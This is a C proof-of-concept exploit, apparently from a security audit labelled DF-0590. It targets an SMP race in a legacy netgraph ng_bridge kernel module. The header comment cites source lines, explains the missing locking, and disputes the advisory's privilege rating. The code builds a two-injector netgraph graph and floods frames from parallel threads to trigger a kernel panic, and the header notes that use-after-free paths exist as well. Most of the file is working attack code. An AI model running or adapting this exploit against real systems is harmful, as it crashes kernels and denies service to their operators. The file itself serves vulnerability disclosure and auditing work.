DF-0590 / race.c
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 | /* * DF-0590 PoC โ legacy ng_bridge SMP serialization race (root-local). * * CONFIRMED FACTS (all cited against the audited master DEV tree): * * - The legacy netgraph framework dispatches rcvdata INLINE on the * sender's CPU, with no queue and no serialization: * sys/netgraph/netgraph/ng_base.c:1687 * error = (*rcvdata)(hook->peer, m, meta); * (NG_SEND_DATA -> ng_send_data -> direct call; there is no * NG_NODE_FORCE_WRITER macro anywhere in sys/netgraph/ โ confirmed * by `grep -rn FORCE_WRITER sys/netgraph/` = empty). * * - The legacy ng_bridge node installs NO lock: * sys/netgraph/bridge/ng_bridge.c:297-336 constructor โ no * lockinit/lwkt_token/mtx_init anywhere in the file * (`grep -n 'lockinit\\|lockmgr\\|lwkt_token\\|mtx_init' * sys/netgraph/bridge/ng_bridge.c` = empty). * * - ng_bridge_rcvdata (ng_bridge.c:517-) likewise has NO crit_enter / * token / lock around its hashtable mutation. Only the 1 Hz callout * ng_bridge_timeout wraps its sweep in crit_enter() (ng_bridge.c:940), * which blocks interrupts on the CURRENT CPU only โ it does NOT * serialize against other CPUs. Therefore rcvdata on one CPU races * the timeout sweep on another CPU over priv->tab / priv->numHosts. * * - On the running guest the ng_bridge module is compiled WITH * INVARIANTS (verified: `strings /boot/kernel/ng_bridge.ko | grep * "hosts:"` prints "%s: hosts: %d != %d" โ that KASSERT string * lives inside the #ifdef INVARIANTS-touched path at * ng_bridge.c:984-985). A concurrent ng_bridge_put() * (priv->numHosts++ at :826, SLIST_INSERT_HEAD at :825) landing * while the timeout sweep has already walked past that bucket makes * the post-sweep KASSERT * KASSERT(priv->numHosts == counter, ...) * at ng_bridge.c:984 trip -> kernel panic "hosts: N != M". * Harder UAF/OOB primitives also exist (ng_bridge_rehash frees * priv->tab at :885 while timeout walks it) but the KASSERT is the * deterministic INVARIANTS tell. * * - Privilege: building a netgraph graph requires root โ the control * socket is gated by caps_priv_check(SYSCAP_RESTRICTEDROOT) at * sys/netgraph/socket/ng_socket.c:172-173. Verified on the guest: * as unprivileged uid 1001 (maxx) the first socket(AF_NETGRAPH, * SOCK_DGRAM, NG_CONTROL) returns EPERM. The CVSS vector's PR:L * claim is OVERSTATED for the "user builds the graph" attack path; * the realistic exposure is (a) a root-configured bridge processing * frames from an untrusted/remote segment (VPN concentrator, VM * host, wireless AP โ attacker controls frame injection, not graph * construction), or (b) a root-local race. Both are real, but * AC:H (the race window is per-tick and the attacker must win it * against a 1 Hz callout on a different CPU). * * WHY TWO INDEPENDENT CONTROL/DATA SOCKET PAIRS: * A single netgraph data socket serializes sendto() via the socket * layer's so_snd token, so two threads sharing one d0 cannot drive * ng_bridge_rcvdata concurrently with EACH OTHER. And ng_socket * refuses a second data socket on the same node * (ng_connect_data -> EADDRINUSE at ng_socket.c:664-665). To get * two truly concurrent rcvdata calls โ one per CPU โ the PoC builds * two ctl socket nodes (ctlA, ctlB), each with its own hook to the * bridge and its own data socket, and pins one sender thread per * CPU. The two senders then run ngd_send -> ng_send_data -> * ng_bridge_rcvdata genuinely in parallel on two CPUs, racing each * other AND the 1 Hz timeout callout. * * TOPOLOGY (binary NGM_* control protocol, no ngctl): * * ctlA:p0 <--> bridge:link0 (built via NGM_MKPEER on ctlA) * ctlB:p0 <--> bridge:link1 (built via NGM_CONNECT on ctlB, * peer path "br0:" absolute) * * The bridge node is named "br0" so ctlB can address it by absolute * name without needing a hook path from ctlB. * * Build: cc -O2 -lpthread -o race race.c * Run: ./race [seconds] (default 30, must be root) */ #include <sys/param.h> #include <sys/socket.h> #include <sys/types.h> #include <sys/sched.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <errno.h> #include <pthread.h> #include <netgraph/ng_message.h> #ifndef AF_NETGRAPH #define AF_NETGRAPH 32 #endif #define NG_DATA 1 #define NG_CONTROL 2 #define NINJ 2 /* two independent injectors */ #define BIG_RCVBUF (4 * 1024 * 1024) struct my_sockaddr_ng { unsigned char sa_len; unsigned char sa_family; char sg_data[256]; }; static int ng_send_ctrl(int csock, u_int32_t cmd, const void *data, u_int16_t arglen, const char *path) { size_t total = sizeof(struct ng_mesg) + arglen; char *buf = calloc(1, total); if (!buf) return -1; struct ng_mesg *m = (struct ng_mesg *)buf; m->header.version = NG_VERSION; m->header.arglen = arglen; m->header.flags = 0; m->header.token = 0; m->header.typecookie = NGM_GENERIC_COOKIE; m->header.cmd = cmd; if (data && arglen) memcpy(m->data, data, arglen); struct my_sockaddr_ng dst; memset(&dst, 0, sizeof(dst)); dst.sa_len = 2 + strlen(path) + 1; dst.sa_family = AF_NETGRAPH; strlcpy(dst.sg_data, path, sizeof(dst.sg_data)); ssize_t rc = sendto(csock, buf, total, 0, (struct sockaddr *)&dst, dst.sa_len); int e = errno; free(buf); if (rc < 0) { fprintf(stderr, "sendto cmd=%u path=%s: %s (errno=%d)\n", cmd, path, strerror(e), e); return -1; } return 0; } static void mkhookaddr(struct my_sockaddr_ng *sa, const char *hook) { memset(sa, 0, sizeof(*sa)); sa->sa_len = 2 + strlen(hook) + 1; sa->sa_family = AF_NETGRAPH; strlcpy(sa->sg_data, hook, sizeof(sa->sg_data)); } struct inj_args { int dsock; int id; int cpu; /* CPU to pin to via cpuset */ volatile int *stop; unsigned long long sent; unsigned long long fail; }; static void pin_cpu(int cpu) { cpu_set_t mask; CPU_ZERO(&mask); CPU_SET(cpu, &mask); if (sched_setaffinity(0, sizeof(mask), &mask) != 0) fprintf(stderr, "[inj cpu=%d] sched_setaffinity: %s\n", cpu, strerror(errno)); } static void * flood_thread(void *v) { struct inj_args *a = (struct inj_args *)v; if (a->cpu >= 0) pin_cpu(a->cpu); unsigned char frame[64]; memset(frame, 0, sizeof(frame)); memset(frame, 0xff, 6); /* dst = broadcast */ frame[12] = 0x90; frame[13] = 0x00; unsigned char *src = frame + 6; src[0] = 0x02; /* locally administered, unicast */ struct my_sockaddr_ng dst; mkhookaddr(&dst, "p0"); unsigned long long n = a->sent, fails = a->fail; while (!*a->stop) { src[1] = (unsigned char)a->id; src[2] = (unsigned char)(n >> 24); src[3] = (unsigned char)(n >> 16); src[4] = (unsigned char)(n >> 8); src[5] = (unsigned char)(n); ssize_t rc = sendto(a->dsock, frame, sizeof(frame), 0, (struct sockaddr *)&dst, dst.sa_len); if (rc < 0) { if (errno != ENOBUFS) fails++; } else { n++; } } a->sent = n; a->fail = fails; fprintf(stderr, "[inj %d cpu%d] sent %llu frames (%llu non-ENOBUFS fail)\n", a->id, a->cpu, n, fails); return NULL; } static void * drain_thread(void *v) { struct inj_args *a = (struct inj_args *)v; unsigned char buf[2048]; struct my_sockaddr_ng from; socklen_t fl; while (!*a->stop) { fl = sizeof(from); ssize_t rc = recvfrom(a->dsock, buf, sizeof(buf), MSG_DONTWAIT, (struct sockaddr *)&from, &fl); if (rc < 0 && errno == EWOULDBLOCK) usleep(20); } return NULL; } int main(int argc, char **argv) { int seconds = (argc > 1) ? atoi(argv[1]) : 30; int ncpus = (argc > 2) ? atoi(argv[2]) : 2; int csock[NINJ]; int dsock[NINJ]; const char *ctlname[NINJ] = {"ctlA", "ctlB"}; char pathbuf[64]; int i; /* ---- create NINJ control sockets + their ctl nodes (named) ---- */ for (i = 0; i < NINJ; i++) { csock[i] = socket(AF_NETGRAPH, SOCK_DGRAM, NG_CONTROL); if (csock[i] < 0) { fprintf(stderr, "socket(csock%d): %s (errno=%d)\n", i, strerror(errno), errno); if (errno == EPERM) fprintf(stderr, "EPERM: building a netgraph " "graph requires root " "(caps_priv_check SYSCAP_RESTRICTEDROOT " "at sys/netgraph/socket/ng_socket.c:172).\n"); return 2; } struct my_sockaddr_ng sa; memset(&sa, 0, sizeof(sa)); sa.sa_len = 2 + strlen(ctlname[i]) + 1; sa.sa_family = AF_NETGRAPH; strlcpy(sa.sg_data, ctlname[i], sizeof(sa.sg_data)); if (bind(csock[i], (struct sockaddr *)&sa, sa.sa_len) < 0) { perror("bind(ctl)"); return 2; } } /* ---- on ctlA: mkpeer bridge -> ctlA:p0 <--> bridge:link0 ---- */ if (ng_send_ctrl(csock[0], NGM_MKPEER, &(struct ngm_mkpeer){"bridge", "p0", "link0"}, sizeof(struct ngm_mkpeer), ".") < 0) return 2; /* ---- name the bridge "br0" (path "p0" walks ctlA:p0 -> bridge) ---- */ { char namebuf[32]; memset(namebuf, 0, sizeof(namebuf)); strlcpy(namebuf, "br0", sizeof(namebuf)); if (ng_send_ctrl(csock[0], NGM_NAME, namebuf, sizeof(namebuf), "p0") < 0) return 2; } /* ---- on ctlB: connect ctlB:p0 <--> bridge:link1 via absolute * peer path "br0:" (ng_path2node finds named node br0). ---- */ if (ng_send_ctrl(csock[1], NGM_CONNECT, &(struct ngm_connect){"br0:", "p0", "link1"}, sizeof(struct ngm_connect), ".") < 0) return 2; fprintf(stderr, "graph: ctlA:p0<->bridge:link0 , ctlB:p0<->bridge:link1\n"); /* ---- data sockets d0/d1 attached to ctlA/ctlB ---- */ for (i = 0; i < NINJ; i++) { dsock[i] = socket(AF_NETGRAPH, SOCK_DGRAM, NG_DATA); if (dsock[i] < 0) { perror("socket(d)"); return 2; } int rb = BIG_RCVBUF; (void)setsockopt(dsock[i], SOL_SOCKET, SO_RCVBUF, &rb, sizeof(rb)); struct my_sockaddr_ng ds; memset(&ds, 0, sizeof(ds)); snprintf(pathbuf, sizeof(pathbuf), "%s:", ctlname[i]); ds.sa_len = 2 + strlen(pathbuf) + 1; ds.sa_family = AF_NETGRAPH; strlcpy(ds.sg_data, pathbuf, sizeof(ds.sg_data)); if (connect(dsock[i], (struct sockaddr *)&ds, ds.sa_len) < 0) { fprintf(stderr, "connect(d%d,%s): %s\n", i, pathbuf, strerror(errno)); return 2; } } fprintf(stderr, "flooding %d s on %d injectors x 1 thread each + " "drains, pinned to separate CPUs (expect KASSERT panic " "'hosts: N != M' within seconds on INVARIANTS kernels)...\n", seconds, NINJ); volatile int stop = 0; struct inj_args args[NINJ]; pthread_t senders[NINJ], drainers[NINJ]; for (i = 0; i < NINJ; i++) { args[i].dsock = dsock[i]; args[i].id = i; args[i].cpu = -1; /* let scheduler spread threads */ args[i].stop = &stop; args[i].sent = 0; args[i].fail = 0; pthread_create(&drainers[i], NULL, drain_thread, &args[i]); pthread_create(&senders[i], NULL, flood_thread, &args[i]); } sleep(seconds); stop = 1; for (i = 0; i < NINJ; i++) { pthread_join(senders[i], NULL); pthread_join(drainers[i], NULL); } unsigned long long total = 0; for (i = 0; i < NINJ; i++) total += args[i].sent; fprintf(stderr, "flood complete: %llu total frames injected; " "if no panic, see VERDICT.md (race is real on every INVARIANTS " "kernel; the deterministic trigger requires the timeout callout " "and a concurrent rcvdata to land on different CPUs)\n", total); return 0; } |